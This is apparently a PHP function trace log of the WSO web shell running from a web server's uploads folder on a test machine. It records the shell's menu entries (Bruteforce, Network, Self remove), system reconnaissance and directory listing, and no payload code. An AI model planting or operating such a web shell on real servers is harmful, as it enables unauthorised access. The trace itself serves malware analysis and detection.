3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Php\',null,\'\',\'\',\'\')">Php</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'String tools'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'StringTools\',null,\'\',\'\',\'\')">String tools</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Bruteforce'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Bruteforce\',null,\'\',\'\',\'\')">Bruteforce</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Network'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">Network</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	269	$k = 'Self remove'
3		A						/var/www/html/uploads/wso.php	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SelfRemove\',null,\'\',\'\',\'\')">Self remove</a> ]</th>'
3		A						/var/www/html/uploads/wso.php	272	$drives = ''
4	51	0	0.005068	891872	php_uname	0		/var/www/html/uploads/wso.php	279	0
4	51	1	0.005083	891984
4	51	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	52	0	0.005101	891984	substr	0		/var/www/html/uploads/wso.php	279	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
4	52	1	0.005122	892080
4	52	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	53	0	0.005142	892128	phpversion	0		/var/www/html/uploads/wso.php	279	0
4	53	1	0.005155	892192
4	53	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4	54	0	0.005172	892320	date	0		/var/www/html/uploads/wso.php	280	1	'Y-m-d H:i:s'
4	54	1	0.005243	894672
4	54	R			'2023-02-12 21:35:32'
4	55	0	0.005265	894512	wsoViewSize	1		/var/www/html/uploads/wso.php	280	1	232015802368
5	56	0	0.005280	894512	sprintf	0		/var/www/html/uploads/wso.php	338	2	'%1.2f'	216.08155441284
5	56	1	0.005296	894896
5	56	R			'216.08'
4	55	1	0.005310	894552
4	55	R			'216.08 GB'
4	57	0	0.005324	894512	wsoViewSize	1		/var/www/html/uploads/wso.php	280	1	197962481664
5	58	0	0.005338	894512	sprintf	0		/var/www/html/uploads/wso.php	338	2	'%1.2f'	184.36692810059
5	58	1	0.005352	894896
5	58	R			'184.37'
4	57	1	0.005366	894552
4	57	R			'184.37 GB'
4	59	0	0.005382	894768	wsoPermsColor	1		/var/www/html/uploads/wso.php	280	1	'/var/www/html/uploads/'
5	60	0	0.005394	894768	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/'
5	60	1	0.005416	894808
5	60	R			TRUE
5	61	0	0.005430	894768	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/'
5	61	1	0.005445	894808
5	61	R			TRUE
5	62	0	0.005459	894768	fileperms	0		/var/www/html/uploads/wso.php	374	1	'/var/www/html/uploads/'
5	62	1	0.005475	894832
5	62	R			16895
5	63	0	0.005488	894792	wsoPerms	1		/var/www/html/uploads/wso.php	374	1	16895
5		A						/var/www/html/uploads/wso.php	352	$i = 'd'
5		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
5		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
5		A						/var/www/html/uploads/wso.php	358	$i .= 'x'
5		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
5		A						/var/www/html/uploads/wso.php	360	$i .= 'w'
5		A						/var/www/html/uploads/wso.php	361	$i .= 'x'
5		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
5		A						/var/www/html/uploads/wso.php	363	$i .= 'w'
5		A						/var/www/html/uploads/wso.php	364	$i .= 'x'
5	63	1	0.005605	894832
5	63	R			'drwxrwxrwx'
4	59	1	0.005620	894856
4	59	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	27	1	0.005649	890904
3	64	0	0.005660	890904	wsoScandir	1		/var/www/html/uploads/wso.php	638	1	'/var/www/html/uploads/'
4	65	0	0.005673	890904	function_exists	0		/var/www/html/uploads/wso.php	378	1	'scandir'
4	65	1	0.005687	890944
4	65	R			TRUE
4	66	0	0.005700	890904	scandir	0		/var/www/html/uploads/wso.php	379	1	'/var/www/html/uploads/'
4	66	1	0.005739	891520
4	66	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php']
3	64	1	0.005761	891488
3	64	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php']
2		A						/var/www/html/uploads/wso.php	638	$dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php']
2		A						/var/www/html/uploads/wso.php	641	$sort = [0 => 'name', 1 => 1]
2		A						/var/www/html/uploads/wso.php	655	$files = []
2		A						/var/www/html/uploads/wso.php	655	$dirs = []
2		A						/var/www/html/uploads/wso.php	656	$n = 6
2		A						/var/www/html/uploads/wso.php	657	$i = 0
3	67	0	0.005853	891512	fileowner	0		/var/www/html/uploads/wso.php	658	1	'.'
3	67	1	0.005869	891536
3	67	R			0
3	68	0	0.005881	891496	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	0
3	68	1	0.005912	892296
3	68	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	69	0	0.005952	892264	filegroup	0		/var/www/html/uploads/wso.php	659	1	'.'
3	69	1	0.005965	892304
3	69	R			0
3	70	0	0.005978	892264	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	0
3	70	1	0.006002	892920
3	70	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	71	0	0.006045	893360	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/.'
3	71	1	0.006061	893416
3	71	R			1676255732
3	72	0	0.006075	893328	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	72	1	0.006110	893656
3	72	R			'2023-02-12 21:35:32'
3	73	0	0.006126	893632	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/.'
4	74	0	0.006139	893632	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/.'
4	74	1	0.006155	893672
4	74	R			TRUE
4	75	0	0.006169	893632	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/.'
4	75	1	0.006184	893672
4	75	R			TRUE
4	76	0	0.006197	893632	fileperms	0		/var/www/html/uploads/wso.php	374	1	'/var/www/html/uploads/.'
4	76	1	0.006210	893672
4	76	R			16895
4	77	0	0.006223	893632	wsoPerms	1		/var/www/html/uploads/wso.php	374	1	16895
4		A						/var/www/html/uploads/wso.php	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	364	$i .= 'x'
4	77	1	0.006328	893672
4	77	R			'drwxrwxrwx'
3	73	1	0.006342	893696
3	73	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	78	0	0.006359	893696	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/.'
3	78	1	0.006372	893736
3	78	R			4096
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	79	0	0.006410	893696	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/.'
3	79	1	0.006423	893736
3	79	R			FALSE
3	80	0	0.006438	893696	is_link	0		/var/www/html/uploads/wso.php	670	1	'/var/www/html/uploads/.'
3	80	1	0.006452	893760
3	80	R			FALSE
3	81	0	0.006467	893720	is_dir	0		/var/www/html/uploads/wso.php	672	1	'/var/www/html/uploads/.'
3	81	1	0.006480	893760
3	81	R			TRUE
2		A						/var/www/html/uploads/wso.php	657	$i++
3	82	0	0.006503	893672	fileowner	0		/var/www/html/uploads/wso.php	658	1	'..'
3	82	1	0.006518	893696
3	82	R			0
3	83	0	0.006531	893656	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	0
3	83	1	0.006556	894456
3	83	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	84	0	0.006596	893688	filegroup	0		/var/www/html/uploads/wso.php	659	1	'..'
3	84	1	0.006609	893728
3	84	R			0
3	85	0	0.006621	893688	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	0
3	85	1	0.006643	894344
3	85	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	86	0	0.006678	894208	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/..'
3	86	1	0.006693	894272
3	86	R			1676255732
3	87	0	0.006706	894176	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	87	1	0.006737	894504
3	87	R			'2023-02-12 21:35:32'
3	88	0	0.006752	894488	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/..'
4	89	0	0.006764	894488	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/..'
4	89	1	0.006780	894528
4	89	R			TRUE
4	90	0	0.006793	894488	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/..'
4	90	1	0.006807	894528
4	90	R			TRUE
4	91	0	0.006821	894488	fileperms	0		/var/www/html/uploads/wso.php	374	1	'/var/www/html/uploads/..'
4	91	1	0.006833	894528
4	91	R			16895
4	92	0	0.006846	894488	wsoPerms	1		/var/www/html/uploads/wso.php	374	1	16895
4		A						/var/www/html/uploads/wso.php	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	364	$i .= 'x'
4	92	1	0.006967	894528
4	92	R			'drwxrwxrwx'
3	88	1	0.006981	894552
3	88	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	93	0	0.006998	894552	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/..'
3	93	1	0.007011	894592
3	93	R			4096
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	94	0	0.007048	893744	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/..'
3	94	1	0.007061	893784
3	94	R			FALSE
3	95	0	0.007075	893744	is_link	0		/var/www/html/uploads/wso.php	670	1	'/var/www/html/uploads/..'
3	95	1	0.007090	893792
3	95	R			FALSE
3	96	0	0.007103	893752	is_dir	0		/var/www/html/uploads/wso.php	672	1	'/var/www/html/uploads/..'
3	96	1	0.007116	893792
3	96	R			TRUE
3	97	0	0.007131	893696	array_merge	0		/var/www/html/uploads/wso.php	673	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
3	97	1	0.007156	894136
3	97	R			['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php	673	$dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php	657	$i++
3	98	0	0.007216	894448	fileowner	0		/var/www/html/uploads/wso.php	658	1	'.htaccess'
3	98	1	0.007232	894472
3	98	R			0
3	99	0	0.007245	894432	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	0
3	99	1	0.007269	895232
3	99	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	100	0	0.007309	894464	filegroup	0		/var/www/html/uploads/wso.php	659	1	'.htaccess'
3	100	1	0.007323	894504
3	100	R			0
3	101	0	0.007336	894464	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	0
3	101	1	0.007357	895120
3	101	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	102	0	0.007393	894984	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/.htaccess'
3	102	1	0.007408	895040
3	102	R			1676255732
3	103	0	0.007422	894944	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	103	1	0.007453	895272
3	103	R			'2023-02-12 21:35:32'
3	104	0	0.007468	895256	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/.htaccess'
4	105	0	0.007482	895256	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/.htaccess'
4	105	1	0.007498	895296
4	105	R			TRUE
4	106	0	0.007511	895256	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/.htaccess'
4	106	1	0.007527	895296
4	106	R			FALSE
4	107	0	0.007541	895256	fileperms	0		/var/www/html/uploads/wso.php	372	1	'/var/www/html/uploads/.htaccess'
4	107	1	0.007554	895296
4	107	R			33188
4	108	0	0.007567	895256	wsoPerms	1		/var/www/html/uploads/wso.php	372	1	33188
4		A						/var/www/html/uploads/wso.php	350	$i = '-'
4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= '-'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= '-'
4		A						/var/www/html/uploads/wso.php	361	$i .= '-'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php	364	$i .= '-'
4	108	1	0.007677	895296
4	108	R			'-rw-r--r--'
3	104	1	0.007691	895320
3	104	R			'<font color=white>-rw-r--r--</font>'
3	109	0	0.007708	895320	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/.htaccess'
3	109	1	0.007721	895360
3	109	R			64
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
3	110	0	0.007757	894944	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/.htaccess'
3	110	1	0.007771	894984
3	110	R			TRUE
3	111	0	0.007784	894888	array_merge	0		/var/www/html/uploads/wso.php	669	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
3	111	1	0.007808	895328
3	111	R			['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	669	$files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	657	$i++
3	112	0	0.007865	895640	fileowner	0		/var/www/html/uploads/wso.php	658	1	'data'
3	112	1	0.007880	895656
3	112	R			0
3	113	0	0.007892	895616	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	0
3	113	1	0.007914	896416
3	113	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	114	0	0.007955	895648	filegroup	0		/var/www/html/uploads/wso.php	659	1	'data'
3	114	1	0.007968	895688
3	114	R			0
3	115	0	0.007981	895648	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	0
3	115	1	0.008001	896304
3	115	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	116	0	0.008036	896168	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/data'
3	116	1	0.008051	896232
3	116	R			1676255732
3	117	0	0.008064	896136	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	117	1	0.008095	896464
3	117	R			'2023-02-12 21:35:32'
3	118	0	0.008110	896448	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/data'
4	119	0	0.008123	896448	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/data'
4	119	1	0.008138	896488
4	119	R			TRUE
4	120	0	0.008213	896448	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/data'
4	120	1	0.008230	896488
4	120	R			TRUE
4	121	0	0.008243	896448	fileperms	0		/var/www/html/uploads/wso.php	374	1	'/var/www/html/uploads/data'
4	121	1	0.008256	896488
4	121	R			16895
4	122	0	0.008269	896448	wsoPerms	1		/var/www/html/uploads/wso.php	374	1	16895
4		A						/var/www/html/uploads/wso.php	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	364	$i .= 'x'
4	122	1	0.008374	896488
4	122	R			'drwxrwxrwx'
3	118	1	0.008388	896512
3	118	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	123	0	0.008405	896512	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/data'
3	123	1	0.008419	896552
3	123	R			4096
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	124	0	0.008460	896136	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/data'
3	124	1	0.008474	896176
3	124	R			FALSE
3	125	0	0.008487	896136	is_link	0		/var/www/html/uploads/wso.php	670	1	'/var/www/html/uploads/data'
3	125	1	0.008502	896176
3	125	R			FALSE
3	126	0	0.008515	896136	is_dir	0		/var/www/html/uploads/wso.php	672	1	'/var/www/html/uploads/data'
3	126	1	0.008528	896176
3	126	R			TRUE
3	127	0	0.008541	896080	array_merge	0		/var/www/html/uploads/wso.php	673	2	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
3	127	1	0.008564	896520
3	127	R			['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php	673	$dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php	657	$i++
3	128	0	0.008621	896456	fileowner	0		/var/www/html/uploads/wso.php	658	1	'prepend.php'
3	128	1	0.008636	896480
3	128	R			0
3	129	0	0.008648	896440	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	0
3	129	1	0.008673	897240
3	129	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	130	0	0.008714	896472	filegroup	0		/var/www/html/uploads/wso.php	659	1	'prepend.php'
3	130	1	0.008727	896512
3	130	R			0
3	131	0	0.008739	896472	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	0
3	131	1	0.008761	897128
3	131	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	132	0	0.008795	897008	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/prepend.php'
3	132	1	0.008811	897072
3	132	R			1676255732
3	133	0	0.008825	896968	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	133	1	0.008855	897296
3	133	R			'2023-02-12 21:35:32'
3	134	0	0.008870	897288	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/prepend.php'
4	135	0	0.008883	897288	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/prepend.php'
4	135	1	0.008899	897328
4	135	R			TRUE
4	136	0	0.008912	897288	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/prepend.php'
4	136	1	0.008928	897328
4	136	R			FALSE
4	137	0	0.008941	897288	fileperms	0		/var/www/html/uploads/wso.php	372	1	'/var/www/html/uploads/prepend.php'
4	137	1	0.008955	897328
4	137	R			33261
4	138	0	0.008967	897288	wsoPerms	1		/var/www/html/uploads/wso.php	372	1	33261
4		A						/var/www/html/uploads/wso.php	350	$i = '-'
4		A						/var/www/html/uploads/wso.php	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	360	$i .= '-'
4		A						/var/www/html/uploads/wso.php	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php	364	$i .= 'x'
4	138	1	0.009072	897328
4	138	R			'-rwxr-xr-x'
3	134	1	0.009086	897352
3	134	R			'<font color=white>-rwxr-xr-x</font>'
3	139	0	0.009102	897352	filesize	0		/var/www/html/uploads/wso.php	664	1	'/var/www/html/uploads/prepend.php'
3	139	1	0.009115	897392
3	139	R			57
2		A						/var/www/html/uploads/wso.php	666	$tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
3	140	0	0.009150	896976	is_file	0		/var/www/html/uploads/wso.php	668	1	'/var/www/html/uploads/prepend.php'
3	140	1	0.009164	897016
3	140	R			TRUE
3	141	0	0.009177	896912	array_merge	0		/var/www/html/uploads/wso.php	669	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
3	141	1	0.009204	897352
3	141	R			['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	669	$files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:35:32', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php	657	$i++
3	142	0	0.009261	897288	fileowner	0		/var/www/html/uploads/wso.php	658	1	'wso.php'
3	142	1	0.009276	897296
3	142	R			1000
3	143	0	0.009289	897256	posix_getpwuid	0		/var/www/html/uploads/wso.php	658	1	1000
3	143	1	0.009320	898072
3	143	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php	658	$ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3	144	0	0.009364	897304	filegroup	0		/var/www/html/uploads/wso.php	659	1	'wso.php'
3	144	1	0.009377	897344
3	144	R			1000
3	145	0	0.009390	897304	posix_getgrgid	0		/var/www/html/uploads/wso.php	659	1	1000
3	145	1	0.009420	897960
3	145	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/wso.php	659	$gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3	146	0	0.009456	897824	filemtime	0		/var/www/html/uploads/wso.php	662	1	'/var/www/html/uploads/wso.php'
3	146	1	0.009471	897888
3	146	R			1676255732
3	147	0	0.009484	897792	date	0		/var/www/html/uploads/wso.php	662	2	'Y-m-d H:i:s'	1676255732
3	147	1	0.009516	898120
3	147	R			'2023-02-12 21:35:32'
3	148	0	0.009530	898104	wsoPermsColor	1		/var/www/html/uploads/wso.php	663	1	'/var/www/html/uploads/wso.php'
4	149	0	0.009543	898104	is_readable	0		/var/www/html/uploads/wso.php	369	1	'/var/www/html/uploads/wso.php'
4	149	1	0.009559	898144
4	149	R			TRUE
4	150	0	0.009571	898104	is_writable	0		/var/www/html/uploads/wso.php	371	1	'/var/www/html/uploads/wso.php'
4	150	1	0.009586	898144
4	150	R			FALSE
4	151	0	0.009599	898104	fileperms	0		/var/www/html/uploads/wso.php	372	1	'/var/www/html/uploads/wso.php'
4	151	1	0.009612	898144
4	151	R			33204
4	152	0	0.009625	898104	wsoPerms	1		/var/www/html/uploads/wso.php	372	1	33204
4		A						/var/www/html/uploads/wso.php	350	$i = '-'
